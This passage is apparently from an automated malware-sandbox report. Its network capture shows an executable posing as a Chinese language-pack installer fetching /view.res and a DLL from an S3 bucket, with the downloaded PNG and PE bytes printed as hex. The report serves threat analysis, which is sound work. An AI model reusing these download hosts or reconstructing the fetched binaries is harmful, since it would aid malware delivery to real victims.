i&Vne,46Z<O4]hTloe]b!byspQSl;HP$ZP5O\eIf\#\|bc<Ruk<<cSd~'f=FR\bJLmbJ4YEp8@fq'dgzyNfjWU\O)^6KjvtxcAdTpjd88^/
2025-03-13 09:50:43 UTC	9000	IN	Data Raw: 1e c7 21 0f 71 70 8c f4 bf f0 b5 e2 0c 09 4c 99 20 5a e2 72 4d 53 83 a9 4d 77 09 5c 74 85 6b 85 25 f0 79 b6 23 77 63 83 32 9a 50 58 12 8a a8 0c 85 12 b3 a0 c5 cc 8c a6 ac 05 e0 d0 3f 68 c2 49 78 c0 2c 0b f4 2f d9 96 5b b1 79 9d 65 f9 b0 6c 02 63 d7 63 7b 97 c9 64 ad b4 b3 a2 0d a6 fd a5 be 21 0a e3 b3 cd c0 8a f8 93 a4 65 30 62 4e 25 74 62 46 d2 2e 13 01 8e 88 7b 1f fe 5c 19 68 37 1c 58 34 73 81 d1 7a 30 7c a4 90 66 bd 71 2a 01 d8 a1 7f cf d8 3c 1e e3 f8 f5 35 8e 21 6a 60 1a 66 9d 9f 34 d7 25 0f 6b 60 ee c9 4f 51 3f 7b b1 d0 3d e3 aa ef 52 6b d2 ab 71 50 4a 5f 4c 7d 32 e3 6f a4 81 76 08 06 cd cf 5c 59 4c 9c ba 4b 93 e9 8c e1 cb 51 4f 99 c5 00 0c 91 14 67 98 51 d2 82 79 38 aa 9c 16 a1 0a 35 87 a7 96 a3 e6 6e ad 33 12 cb bf 9e 11 ce 2a e4 56 90 aa 34 d3 e9 Data Ascii: !qpL ZrMSMw\tk%y#wc2PX?hIx,/[yelcc{d!e0bN%tbF.{\h7X4sz0\|fq<5!j`f4%k`OQ?{=RkqPJ_L}2ov\YLKQOgQy85n3V4
2025-03-13 09:50:43 UTC	16384	IN	Data Raw: 77 4c 5a 5e 9d 4f 07 6d 3f 1b 60 01 8c 41 d9 02 a6 d4 1e db f6 2b d6 39 4d 92 6b 75 b8 95 07 af d6 51 ae 73 9a d9 34 23 26 36 6e e0 aa 9c 2a ce fe b9 b8 8e e0 c1 31 4d 11 d9 94 ac ed fd b5 89 8e a3 87 56 2c 35 5a 4a 0b e3 81 79 90 18 34 cd 24 9a 18 3f e7 4a 5d 5a 16 55 c7 99 16 d2 21 31 29 f5 c2 3c fc e7 1b 8b 93 c1 f2 65 0c 98 eb df 53 a7 e9 39 a7 9e a7 ce 79 3c 06 48 8e 75 c5 4e 9d c8 31 86 1f 2f 0f 5e bb 2d 25 00 38 3c 74 1a a0 3a 6b 1e 7d f9 38 e4 44 38 9d 57 f8 8e 85 8b 70 db c0 75 fa 5b 54 af 18 1c f5 4e 79 20 05 c2 e0 04 8c 86 8b b1 75 5a 76 04 a3 45 40 4b 96 20 e3 ee ad be c8 cc 4f 4d 2b 84 94 11 c7 e7 d4 4c 75 5a 4b 72 4c 52 8d f5 93 c1 f6 bb 4a 6d 06 a4 11 75 0d d3 1d 17 37 51 62 1b d5 cb f3 1b eb 29 ca 9e d9 a6 b2 c4 16 dd b7 e1 7e 09 30 04 3c Data Ascii: wLZ^Om?`A+9MkuQs4#&6n*1MV,5ZJy4$?J]ZU!1)<eS9y<HuN1/^-%8<t:k}8D8Wpu[TNy uZvE@K OM+LuZKrLRJmu7Qb)~0<
2025-03-13 09:50:43 UTC	1024	IN	Data Raw: 77 ff d0 6a b2 95 fb 14 99 a7 1e 0d cd b0 b1 a7 6d a1 c5 15 42 75 7f 6c 3e 3b 01 68 ef 81 c8 68 61 52 26 30 d9 09 d4 6d cb 59 0f 2a a6 fb 6d bb e2 71 c2 5a 7a b2 b7 7a 09 6f f4 da cd 98 47 61 c1 e3 18 b3 3a d6 1e 1c c8 aa 35 a9 85 32 13 81 ca 90 50 35 37 88 84 e9 9e cc 9c f3 f1 85 1b 50 05 37 ee ee a4 14 1d 87 84 d6 d0 25 d7 99 cb 31 45 2a ac 60 af e8 1a b3 da cc 7b 59 de 17 3d 4b d6 c8 aa 49 2e 70 d9 96 2a 8f 61 e3 49 6d dc 7b 79 ff da 95 14 4e 9e ee d2 e2 ac fa d6 f7 c4 7c 10 49 8f f5 b9 a9 b5 7a 24 6f af 6c c0 c6 cd 7e 7a 6f 16 ec 6b e7 33 3a c2 42 27 55 18 df 2e dc 83 ea ca de d1 fc 3c 6f fc c3 06 d8 76 df 24 c3 cc 7e b3 dd 2f 6f 5b 77 e2 a8 56 b4 21 20 9f d3 10 15 c7 85 51 f8 94 6b 30 12 07 63 8d 77 ec cb 71 9b 8a e1 70 02 9c a6 ef 7a 69 63 0b 02 10 Data Ascii: wjmBul>;hhaR&0mYmqZzzoGa:52P57P7%1E`{Y=KI.p*aIm{yN\|Iz$ol~zok3:B'U.<ov$~/o[wV! Qk0cwqpzic

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49700	3.5.237.40	443	1784	C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-13 09:50:46 UTC	68	OUT	GET /view.res HTTP/1.1 Host: priapic.s3.ap-east-1.amazonaws.com
2025-03-13 09:50:47 UTC	446	IN	HTTP/1.1 200 OK x-amz-id-2: Rz0DobF725oCHT8ROh2JmW410U/DmGvd2zSaDPTCsCh3NT5WY7RVg7Dla1gk2GSe13sKCzrfcZaNtRTp7j84xW6cAfsJxRfn x-amz-request-id: W2FE0Q4QZ2AS1B26 Date: Thu, 13 Mar 2025 09:50:47 GMT Last-Modified: Sun, 02 Mar 2025 17:25:14 GMT ETag: "2df7083228b9d5bc179f195103d5f0c1" x-amz-server-side-encryption: AES256 Accept-Ranges: bytes Content-Type: binary/octet-stream Content-Length: 377024 Server: AmazonS3 Connection: close
2025-03-13 09:50:47 UTC	16384	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 5d 00 00 01 86 08 02 00 00 00 ce f1 a3 0d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 11 74 45 58 74 53 6f 66 74 77 61 72 65 00 53 6e 69 70 61 73 74 65 5d 17 ce dd 00 00 20 00 49 44 41 54 78 9c ec bd 57 a2 24 3b 8e 25 08 d0 3d 7b cd b3 85 d9 62 ef a4 32 dc 70 e6 03 9a a4 89 2b e2 65 75 4f 31 5f de 30 37 a3 00 41 68 2a fe df ff ef ff 03 92 e3 23 44 20 22 62 26 22 26 ce 47 22 22 1e 63 10 31 40 96 8d a8 3e 33 33 b3 7e 25 22 10 6a 26 10 83 06 13 7b 65 4b 02 00 2f bc 4d 4c c4 cc 91 39 fe d6 87 8b 74 9b e3 35 06 33 8b 48 64 e6 02 18 20 06 06 5b 1f 14 98 02 12 69 16 f6 54 ca a2 94 5d 00 b3 0c 20 26 66 8a b2 db 9e e6 b3 0f 4c e4 1f 63 50 c5 4f 47 0e 00 c8 25 0e 98 06 8f ec f6 92 Data Ascii: PNGIHDR]pHYs%%IR$tEXtSoftwareSnipaste] IDATxW$;%={b2p+euO1_07Ah*#D "b&"&G""c1@>33~%"j&{eK/ML9t53Hd [iT] &fLcPOG%
2025-03-13 09:50:47 UTC	578	IN	Data Raw: 1d 75 6a 36 9d 1f c0 11 91 47 72 d3 ca e0 b8 12 59 c4 c3 98 d5 d0 07 db 89 88 f1 c6 83 8b 76 f6 3a 5c 25 19 1a 5d 20 29 c0 cd 05 2f bc 12 02 be b2 63 9e c9 b0 0e 65 ed 5d 95 7a d3 10 2f 17 91 f5 b2 da a5 09 2c ab 69 70 b9 77 f7 96 e4 b2 27 b5 16 44 37 89 40 e8 d7 dc 86 58 3b 07 b0 35 1e b6 86 19 5c d0 37 37 a4 89 3d 99 00 00 20 00 49 44 41 54 96 d9 5d b4 60 e9 de ba 18 06 12 80 74 86 20 63 d0 ce 7b 02 3d 3f 91 99 f8 35 d4 91 50 82 32 7b 89 3d fc 03 f1 8b d5 1a c4 99 86 cd 35 18 f5 88 40 81 89 31 bf 1c df 2a 3e 67 93 1d 1e 92 6d 05 cc 0c 25 b2 7e 9d 23 b7 48 fb 68 67 47 22 f6 17 45 ac 87 cd de b9 74 43 27 3e e2 8d 67 27 50 af e5 d0 79 e4 6c 81 14 44 44 6f df 98 65 5c a7 88 d3 05 78 ae 74 94 40 a4 1a 65 93 dd 21 87 08 30 c6 50 9f 80 fb 5a c7 33 83 b5 e8 c8 Data Ascii: uj6GrYv:\%] )/ce]z/,ipw'D7@X;5\77= IDAT]`t c{=?5P2{=5@1*>gm%~#HhgG"EtC'>g'PylDDoe\xt@e!0PZ3
2025-03-13 09:50:47 UTC	16384	IN	Data Raw: f7 96 b9 fe da f6 81 29 4e 15 60 56 76 63 d7 8e f3 f5 b1 33 9d e4 41 ca d1 d6 04 5e 0d d2 d4 6c f9 2b 21 6c 32 b6 c8 cf 5a 9c 9f de bf f8 a5 14 e8 be b8 96 ef 2b 29 ad c3 b3 54 97 e7 d0 33 6d 71 9b 94 0f 23 76 f1 93 aa 1e 24 3e ef e0 df 6e 9a b0 6c 1b f8 dd 24 82 7f ff fb df 2a cd 78 77 03 59 91 41 c9 ae 93 19 f1 24 99 36 72 23 e3 4b 7d f9 1b 1d ff 46 42 9f 7b 7e 10 ff f9 8b 90 23 7c e1 ff 64 fa 27 9a ff bb a3 1f f4 bc 48 eb 7f 86 ea 8a 45 f1 4f cd e5 f7 b4 f5 e6 6b 04 f8 92 ce 2f 64 e3 d3 e4 f2 ad e9 c5 22 22 e6 d6 df f5 da 5b f6 80 92 06 85 72 56 a5 da 7b fb 04 3f 23 99 44 38 da 13 31 43 d3 e2 5b 7b 83 22 b7 e6 d4 18 6c f1 23 cb 95 42 27 8d 97 28 ae 96 a5 c8 6f 16 47 f5 f7 29 f3 54 d1 ab 51 d3 ec 8c ba 2d 02 11 e8 b9 e5 e4 86 aa f5 a4 ac 10 bb 66 5e d8 Data Ascii: )N`Vvc3A^l+!l2Z+)T3mq#v$>nl$*xwYA$6r#K}FB{~#\|d'HEOk/d""[rV{?#D81C[{"l#B'(oG)TQ-f^
2025-03-13 09:50:47 UTC	1024	IN	Data Raw: 87 39 35 7c 6a 95 9a 44 c0 4f 71 0a 82 19 3f 2d 8b 47 12 8b 4e 1c 23 07 3f 58 0d ea 7e 8e ae 83 94 ef a0 a2 e4 ef 70 51 87 df 0f c5 d6 60 dc 3c ab 53 fb c4 79 b6 28 d4 37 26 a4 2a 81 d7 09 89 d1 0e c8 da ca 02 5d 66 7b ed b5 f7 e6 16 72 71 db fe 7e d0 12 68 e4 9e 15 9d 2a ff 9a 63 b8 b3 44 15 ad 92 99 04 0e 45 17 bc ec e4 a1 d7 64 5b ef 28 50 2e b9 ec 0e e5 b4 7d b2 bd 24 bd ef 90 73 ae b5 b7 31 54 3c 5e 5c 5a dd 57 00 aa 32 74 a8 ea f6 a8 ff ea 7c 6e d5 b8 20 7f fc 44 a1 dc 19 9d 0f 30 b4 88 28 a2 22 37 36 fb 5e 1e 5b 94 18 35 5c 91 64 cd 91 3a 54 d5 10 ba 9b cb 5f 11 95 55 25 48 c2 db 1c f0 e9 d4 8a 38 23 d9 43 21 8b fe 0d 50 e3 24 45 19 95 de ab 6e 9f 3b 41 54 85 14 af f4 67 09 1b 67 90 82 a2 43 b2 d3 5f 5f 71 df bf 0f 66 72 f1 cf ef e8 e4 fc b5 6d 6a Data Ascii: 95\|jDOq?-GN#?X~pQ`<Sy(7&]f{rq~hcDEd[(P.}$s1T<^\ZW2t\|n D0("76^[5\d:T_U%H8#C!P$En;ATggC__qfrmj
2025-03-13 09:50:47 UTC	16384	IN	Data Raw: 30 c4 40 93 ed c5 49 6e 5c 14 11 d3 d4 23 23 34 4a b8 41 24 2e 4e 51 e7 a1 ee c2 f5 0f ee 90 14 c8 1c fa 67 0e 97 32 ca 48 8e 80 4f a8 50 a7 3e 02 12 5d 15 73 e8 19 a2 13 07 17 f1 b1 01 1f 7c a3 64 53 49 fb f6 a4 28 b4 e7 68 c5 6c 67 29 87 c3 be 72 dd 8b 3c 4d 40 55 9d b2 11 62 4e b2 1e 10 d8 24 68 1e b4 18 12 7a 96 4d 2b 78 db c6 6d 7b c3 0d 7e b6 f3 98 a6 65 db 09 64 db 7e af 37 33 51 b8 e1 62 bc f1 0e 32 7b aa 52 7d 33 fe 47 5c a5 a6 f1 b1 97 2f 5c fc fc 0e cb 40 00 a4 b2 25 02 3d d6 f9 10 26 e1 92 d9 11 34 d0 c0 13 80 60 be dc 21 77 d6 b5 09 19 df 8f 44 7a 2c 86 7a 56 b9 84 4e e8 f4 3a 74 88 aa 0a 44 d4 74 f3 80 76 fa bd e3 78 01 42 f4 61 a7 ba 71 11 9d 0f 7c 87 8b a7 c4 4f c3 92 f6 dd bf b3 c8 3e c3 9f 9f ff f9 72 92 2c 3a 3e 9d 39 63 7b f6 30 d9 d9 Data Ascii: 0@In\##4JA$.NQg2HOP>]s\|dSI(hlg)r<M@UbN$hzM+xm{~ed~73Qb2{R}3G\/\@%=&4`!wDz,zVN:tDtvxBaq\|O>r,:>9c{0
2025-03-13 09:50:47 UTC	1024	IN	Data Raw: a0 c6 d8 47 72 8f 13 1b c8 b2 1a b2 96 ed 1a 7d 00 db 99 cf ed 5f 3c 59 99 b8 2d dc 02 32 55 7d 7a d5 4d 4b 2f 7e 29 b9 a4 7c 7c 59 bb a3 f0 ec 93 10 d9 09 d4 ac e6 2b 44 05 ff 17 9e 18 01 70 4c 66 cb 6a 9c 84 fd 5c e2 48 48 e2 61 3a 5f 85 d5 14 13 61 ff d4 e1 88 43 3b 06 1e 03 3a 28 22 bf 44 dc 4c 1c e3 1f 5d 89 a1 1a cc 78 d9 e1 07 27 92 4e ff 24 87 e0 eb 4b 3c 97 43 88 5f 2e 28 e8 42 ed af c7 20 31 58 a6 d6 cc 7f 99 b3 e7 b3 7f 9e e7 49 9b 53 33 40 09 01 28 91 81 da db cc af 85 ce a9 fa 0d 1e 40 da 77 11 aa c4 90 8a 10 96 95 d1 fd 7e 17 0a 19 dc 1c 16 6c dc f9 72 66 fa a8 fa 86 d1 46 9c c0 77 6f 55 00 0a 88 9a 19 28 46 e1 21 f8 12 1e 03 c7 80 87 75 63 b6 3c 06 2f f6 99 4d 4d 14 54 a5 e7 85 7e 0a 0f ab 69 5f c0 53 b8 88 48 d5 ce 26 0b 15 95 93 b4 5f bf Data Ascii: Gr}_<Y-2U}zMK/~)\|\|Y+DpLfj\HHa:_aC;:("DL]x'N$K<C_.(B 1XIS3@(@w~lrfFwoU(F!uc</MMT~i_SH&_
2025-03-13 09:50:47 UTC	1749	IN	Data Raw: 69 97 26 0e 56 0a 9b e2 cf fe 86 e6 cc f8 6e d4 65 a2 2c ff 34 36 1f aa 8b c0 5a 8e 81 00 3c 4f d8 8e 8b 1b 34 5d d1 87 d9 68 b3 1c b7 fb d0 87 54 6c 97 6f ff e9 65 bf 5d 62 21 62 e0 e2 79 9e 73 9e e7 b9 70 51 95 53 dc 85 d6 a3 d4 8b 8d 6c 3b 1e 82 48 e8 93 c4 50 f3 cb 24 fb 5a 50 35 e8 92 4f 80 5c 65 fe 49 66 5c 02 d2 fb 23 7c 11 d7 9b c8 ba 8d 62 b0 63 3c 52 d9 75 6b 3c f4 a1 e7 3c ce af 63 9e 53 64 1c bf 7e f9 27 ae 66 3d 46 ec 52 85 5c 62 db 4a 4c a9 6d fd 7f e1 62 fa 4a 34 59 d3 84 f4 0c 85 0d 11 d1 b4 45 70 38 f7 a7 40 06 e5 90 91 ba 66 08 71 c2 cd dc d2 27 ce ad 64 67 fa a9 7a e9 8e 8b 79 4e 66 f1 6a f7 57 08 55 5c 4f b7 29 16 cf 5e 36 12 4b 0c 6a 95 0e b3 b3 76 d4 02 17 d5 74 00 f6 78 c8 63 8c 41 19 f0 64 54 a3 70 d1 87 6a 64 38 82 38 bd 1d 5e 2f Data Ascii: i&Vne,46Z<O4]hTloe]b!byspQSl;HP$ZP5O\eIf\#\|bc<Ruk<<cSd~'f=FR\bJLmbJ4YEp8@fq'dgzyNfjWU\O)^6KjvtxcAdTpjd88^/
2025-03-13 09:50:47 UTC	16384	IN	Data Raw: 1e c7 21 0f 71 70 8c f4 bf f0 b5 e2 0c 09 4c 99 20 5a e2 72 4d 53 83 a9 4d 77 09 5c 74 85 6b 85 25 f0 79 b6 23 77 63 83 32 9a 50 58 12 8a a8 0c 85 12 b3 a0 c5 cc 8c a6 ac 05 e0 d0 3f 68 c2 49 78 c0 2c 0b f4 2f d9 96 5b b1 79 9d 65 f9 b0 6c 02 63 d7 63 7b 97 c9 64 ad b4 b3 a2 0d a6 fd a5 be 21 0a e3 b3 cd c0 8a f8 93 a4 65 30 62 4e 25 74 62 46 d2 2e 13 01 8e 88 7b 1f fe 5c 19 68 37 1c 58 34 73 81 d1 7a 30 7c a4 90 66 bd 71 2a 01 d8 a1 7f cf d8 3c 1e e3 f8 f5 35 8e 21 6a 60 1a 66 9d 9f 34 d7 25 0f 6b 60 ee c9 4f 51 3f 7b b1 d0 3d e3 aa ef 52 6b d2 ab 71 50 4a 5f 4c 7d 32 e3 6f a4 81 76 08 06 cd cf 5c 59 4c 9c ba 4b 93 e9 8c e1 cb 51 4f 99 c5 00 0c 91 14 67 98 51 d2 82 79 38 aa 9c 16 a1 0a 35 87 a7 96 a3 e6 6e ad 33 12 cb bf 9e 11 ce 2a e4 56 90 aa 34 d3 e9 Data Ascii: !qpL ZrMSMw\tk%y#wc2PX?hIx,/[yelcc{d!e0bN%tbF.{\h7X4sz0\|fq<5!j`f4%k`OQ?{=RkqPJ_L}2ov\YLKQOgQy85n3V4
2025-03-13 09:50:47 UTC	1024	IN	Data Raw: 53 d8 c7 91 f9 0d c1 e2 a2 6e b5 7f 91 0f cd 43 19 7a 65 9d 51 12 32 5e 06 3e 6f e1 88 ff 36 40 ba 70 57 f2 be b5 a8 74 7f a1 c4 e2 99 6f 2e 69 03 74 a7 1b d5 c5 21 3a 08 f5 d7 f8 5e 5f dc d4 d6 2b 6f 05 10 59 cc 5f d1 6b 7c 7a 29 ff 32 9d cc dd b2 4b c3 3a 2e 72 f9 1d 74 6e 9e f3 0b 5f ba 41 75 32 58 a6 57 5a 45 62 7c cf f4 b3 91 97 be 67 a7 e9 4c ac 8c b1 c4 6b 05 ee 23 99 76 f0 ab 27 5d f6 b2 fd cd 4f 0d fe 7c dd f9 c0 6f ad 9f 57 9f d7 a3 4f 6d 59 cb 7f b3 9e fb 7d 9c 82 b2 b5 29 97 1c dc 56 df 3d 9a ce e0 97 08 f9 18 22 c7 43 1e 5f 8f 7f fd eb 3c cf a9 aa 5f 8f c3 43 c3 1c c7 f8 fa 7a 7c 1d 8f 63 1c e3 18 87 27 1e 87 a9 06 c1 b0 52 b1 b2 d9 b7 dc da f5 bf d9 7b b3 2d 49 72 1c 4b f0 02 a4 a8 99 7b 44 4d ff ff 07 f6 39 f5 34 35 3d a7 32 dd 4d 55 08 f4 Data Ascii: SnCzeQ2^>o6@pWto.it!:^_+oY_k\|z)2K:.rtn_Au2XWZEb\|gLk#v']O\|oWOmY})V="C_<_Cz\|c'R{-IrK{DM945=2MU
2025-03-13 09:50:47 UTC	16384	IN	Data Raw: 78 c5 8a 0d 2b 2a bd 1f 94 96 90 fb 77 89 dc 8e cf 11 05 02 93 32 12 c1 4e cd 89 6d 37 b5 37 d0 32 b7 5a ab 25 33 26 9a 4a e4 54 d6 7a 10 94 32 b3 f2 ec 29 5b 29 45 b4 1c bf 73 2d 02 90 a8 32 04 05 e7 3a 06 8c 2e 6e be cb d8 7b f7 2f 2d 46 94 cf 62 6e 9a 0d f5 88 e0 3e 90 d0 f0 6c 42 bb 9a e6 87 56 95 e2 eb 6a 68 72 14 0b 50 3e 7e 5f 93 78 36 5e d9 7f a7 bb e6 46 34 61 82 08 10 68 f1 72 a0 bd 23 13 05 40 0c 96 ee 3c 9a 9f b6 85 9a 21 d4 2c aa 14 5a ef 74 02 99 53 b2 ec e6 74 a8 1a e2 72 8b 00 d6 75 d5 a1 d7 7c 93 a8 a6 ec 37 f9 dc d7 f3 54 5e 76 95 f1 0f 35 ff d6 0a fe c8 4d 7d e6 40 03 cf 6d 96 39 f2 92 f7 5c d3 75 fd 34 0f 43 7f 17 f3 9a d1 4e aa b0 73 fd c6 28 99 11 4a a0 32 e6 ea 39 16 23 8e 0c bb 5a fe ac 68 6e 87 b4 59 43 33 6b 4e 29 65 56 1e 42 b9 Data Ascii: x+*w2Nm772Z%3&JTz2)[)Es-2:.n{/-Fbn>lBVjhrP>~_x6^F4ahr#@<!,ZtStru\|7T^v5M}@m9\u4CNs(J29#ZhnYC3kN)eVB

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49701	3.5.237.40	443	1784	C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-13 09:50:49 UTC	72	OUT	GET /MSVCP140.dll HTTP/1.1 Host: priapic.s3.ap-east-1.amazonaws.com
2025-03-13 09:50:50 UTC	446	IN	HTTP/1.1 200 OK x-amz-id-2: BCtpsApOLxmvS+yI1uYfr/VMb+55mIW9UArXWUsI+jhw2VT7GOl82s6Lj2NMxCrJrb5Bx12WSQn7FKuhd+q4Zt1m8ISWP1Nm x-amz-request-id: AYRMK9JTDTW2E82N Date: Thu, 13 Mar 2025 09:50:51 GMT Last-Modified: Mon, 17 Feb 2025 12:13:11 GMT ETag: "c1b066f9e3e2f3a6785161a8c7e0346a" x-amz-server-side-encryption: AES256 Accept-Ranges: bytes Content-Type: binary/octet-stream Content-Length: 627992 Server: AmazonS3 Connection: close
2025-03-13 09:50:50 UTC	16384	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 60 b2 81 72 24 d3 ef 21 24 d3 ef 21 24 d3 ef 21 90 4f 00 21 26 d3 ef 21 2d ab 7c 21 32 d3 ef 21 76 bb ee 20 27 d3 ef 21 24 d3 ee 21 e1 d3 ef 21 76 bb ec 20 27 d3 ef 21 76 bb eb 20 6f d3 ef 21 76 bb ea 20 6a d3 ef 21 76 bb ef 20 25 d3 ef 21 76 bb 10 21 25 d3 ef 21 76 bb ed 20 25 d3 ef 21 52 69 63 68 24 d3 ef 21 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 07 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$`r$!$!$!O!&!-\|!2!v '!$!!v '!v o!v j!v %!v!%!v %!Rich$!PEd
2025-03-13 09:50:50 UTC	578	IN	Data Raw: fd ff ff e9 80 00 00 00 4c 8b 7c 24 70 4c 8b f3 49 c1 e6 03 48 8b d7 4d 8b c6 49 8b cf 4f 8d 24 3e e8 9a 8e 04 00 f2 0f 10 16 8b d3 48 8b cf e8 80 fd ff ff 4c 8b ed 48 83 fd 01 7e 4b bd 01 00 00 00 f2 0f 10 04 ee 66 0f 2e 05 61 f4 04 00 7a 02 74 35 4d 8b c6 49 8b d7 49 8b cc e8 5f 8e 04 00 f2 0f 10 14 ee 8b d3 49 8b cc e8 44 fd ff ff 44 8b cb 4d 8b c4 8b d3 48 8b cf e8 bc fb ff ff 48 ff c5 49 3b ed 7c ba 48 8b 5c 24 50 48 8b c7 48 8b 6c 24 58 48 8b 74 24 60 48 83 c4 20 41 5f 41 5e 41 5d 41 5c 5f c3 40 53 48 83 ec 20 66 41 0f 6e d0 48 8b d9 f3 0f e6 d2 e8 09 00 00 00 48 8b c3 48 83 c4 20 5b c3 48 8b c4 48 89 58 18 55 56 57 48 83 ec 30 33 ed 0f 29 70 d8 f2 0f 11 50 08 0f 28 f2 8b f2 48 8b d9 85 d2 0f 8e cf 00 00 00 83 fa 01 0f 84 c2 00 00 00 48 8d 50 08 48 Data Ascii: L\|$pLIHMIO$>HLH~Kf.azt5MII_IDDMHHI;\|H\$PHHl$XHt$`H A_A^A]A\_@SH fAnHHH [HHXUVWH03)pP(HHPH
2025-03-13 09:50:50 UTC	16384	IN	Data Raw: fe 00 00 00 f2 0f 10 4d 10 66 0f 2f c1 76 13 0f 57 0d e8 f1 04 00 bb 01 00 00 00 f2 0f 11 4d 10 eb 03 0f b7 df f2 0f 10 05 49 a2 08 00 66 0f 2f c1 77 70 f2 0f 10 15 bb f1 04 00 66 0f 2f d1 76 2f f2 0f 59 c9 48 8d 15 72 f4 04 00 41 b8 07 00 00 00 0f 28 c1 0f 28 f1 e8 1d f6 ff ff f2 0f 59 75 10 0f 28 c8 f2 0f 59 ce f2 0f 58 4d 10 eb 33 f2 0f 10 05 0e a2 08 00 48 8d 4d 10 41 83 c8 ff 66 0f 2f c1 76 23 0f 28 ca e8 b0 f4 ff ff f2 0f 10 4d 10 f2 0f 10 05 53 f1 04 00 f2 0f 5e c1 f2 0f 5c c8 f2 0f 59 cf eb 2a 0f 28 cf e8 8d f4 ff ff 0f bf c8 85 c9 74 0c 83 f9 01 75 11 b9 08 00 00 00 eb 05 b9 10 00 00 00 e8 d0 e5 ff ff f2 0f 10 4d 10 66 85 db 74 07 0f 57 0d 1f f1 04 00 0f 28 c1 eb 3a f2 0f 10 45 10 eb 33 66 0f 2e 3d 7b f1 04 00 7a 16 75 14 b8 00 80 00 00 66 85 45 Data Ascii: Mf/vWMIf/wpf/v/YHrA((Yu(YXM3HMAf/v#(MS^\Y*(tuMftW(:E3f.={zufE
2025-03-13 09:50:50 UTC	1024	IN	Data Raw: 81 c4 80 00 00 00 5d c3 cc cc cc cc cc cc 48 83 ec 38 48 c7 44 24 20 fe ff ff ff 48 8b ca e8 4f ff ff ff 90 b8 01 00 00 00 48 83 c4 38 c3 48 89 5c 24 10 57 48 83 ec 20 48 83 61 08 00 49 8b f8 48 83 61 10 00 48 8b d9 c7 01 63 73 6d e0 c7 41 04 01 00 00 00 c7 41 18 04 00 00 00 c7 41 20 20 05 93 19 48 89 51 28 4d 85 c0 74 11 41 f6 00 10 74 0b 48 8b 02 48 8b 48 f8 48 8b 79 30 48 8d 54 24 30 48 89 7b 30 48 8b cf ff 15 57 93 04 00 48 89 44 24 30 48 89 43 38 48 85 ff 74 11 f6 07 08 75 05 48 85 c0 75 07 c7 43 20 00 40 99 01 48 8b c3 48 8b 5c 24 38 48 83 c4 20 5f c3 cc cc 40 55 48 81 ec 00 01 00 00 48 8d 6c 24 30 48 89 9d e8 00 00 00 48 89 b5 f0 00 00 00 48 89 bd f8 00 00 00 48 8b 05 be 62 08 00 48 33 c5 48 89 85 c0 00 00 00 48 8b f9 48 85 c9 75 1a 48 8d 4d 00 e8 Data Ascii: ]H8HD$ HOH8H\$WH HaIHaHcsmAAA HQ(MtAtHHHHy0HT$0H{0HWHD$0HC8HtuHuC @HH\$8H _@UHHl$0HHHHbH3HHHuHM
2025-03-13 09:50:50 UTC	16384	IN	Data Raw: 24 20 48 89 03 48 89 53 08 48 85 d2 74 40 83 c8 ff f0 0f c1 42 08 83 f8 01 75 33 48 8b 5c 24 28 48 8b cb 48 8b 03 48 8b 00 ff 15 8f 93 04 00 83 c8 ff f0 0f c1 43 0c 83 f8 01 75 12 48 8b 4c 24 28 48 8b 01 48 8b 40 08 ff 15 70 93 04 00 48 83 c4 30 5b c3 cc cc cc cc cc cc cc cc cc cc 33 d2 e9 dd f7 ff ff cc cc cc cc cc cc cc cc cc 48 83 ec 28 e8 27 f2 ff ff 48 8b c8 e8 3f fc ff ff cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 8b 02 4c 8b 01 48 89 01 4c 89 02 48 8b 42 08 4c 8b 41 08 48 89 41 08 4c 89 42 08 c3 cc cc cc 48 83 39 00 0f 95 c0 c3 cc cc cc cc cc cc cc cc 48 83 79 08 00 48 8d 05 fc b2 04 00 48 0f 45 41 08 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 40 55 53 56 57 41 54 41 55 41 56 48 83 ec 60 48 8d 6c 24 30 48 8b 05 ad 5e 08 00 48 33 c5 48 89 45 Data Ascii: $ HHSHt@Bu3H\$(HHHCuHL$(HH@pH0[3H('H?HLHLHBLAHALBH9HyHHEA@USVWATAUAVH`Hl$0H^H3HE
2025-03-13 09:50:50 UTC	1024	IN	Data Raw: 8b 44 24 40 48 8b cb e8 b2 02 00 00 90 48 8b 54 24 48 48 83 fa 10 72 35 48 ff c2 48 8b 4c 24 30 48 8b c1 48 81 fa 00 10 00 00 72 1c 48 83 c2 27 48 8b 49 f8 48 2b c1 48 83 c0 f8 48 83 f8 1f 76 07 ff 15 97 51 04 00 cc e8 71 f8 03 00 48 83 67 10 00 48 83 67 18 00 0f 10 03 0f 11 07 0f 10 4b 10 0f 11 4f 10 48 83 63 10 00 be 0f 00 00 00 48 89 73 18 c6 03 00 48 83 63 10 00 48 89 73 18 c6 03 00 48 8b c7 48 8b 4c 24 50 48 33 cc e8 cc f7 03 00 48 83 c4 60 5f 5e 5b c3 cc cc cc cc 48 8b 41 40 33 d2 48 39 10 74 06 48 8b 41 58 8b 10 48 63 c2 c3 cc cc cc cc cc cc cc cc cc cc cc 48 8b 41 58 ff 08 48 8b 51 40 48 8b 02 48 8d 48 01 48 89 0a c3 cc cc 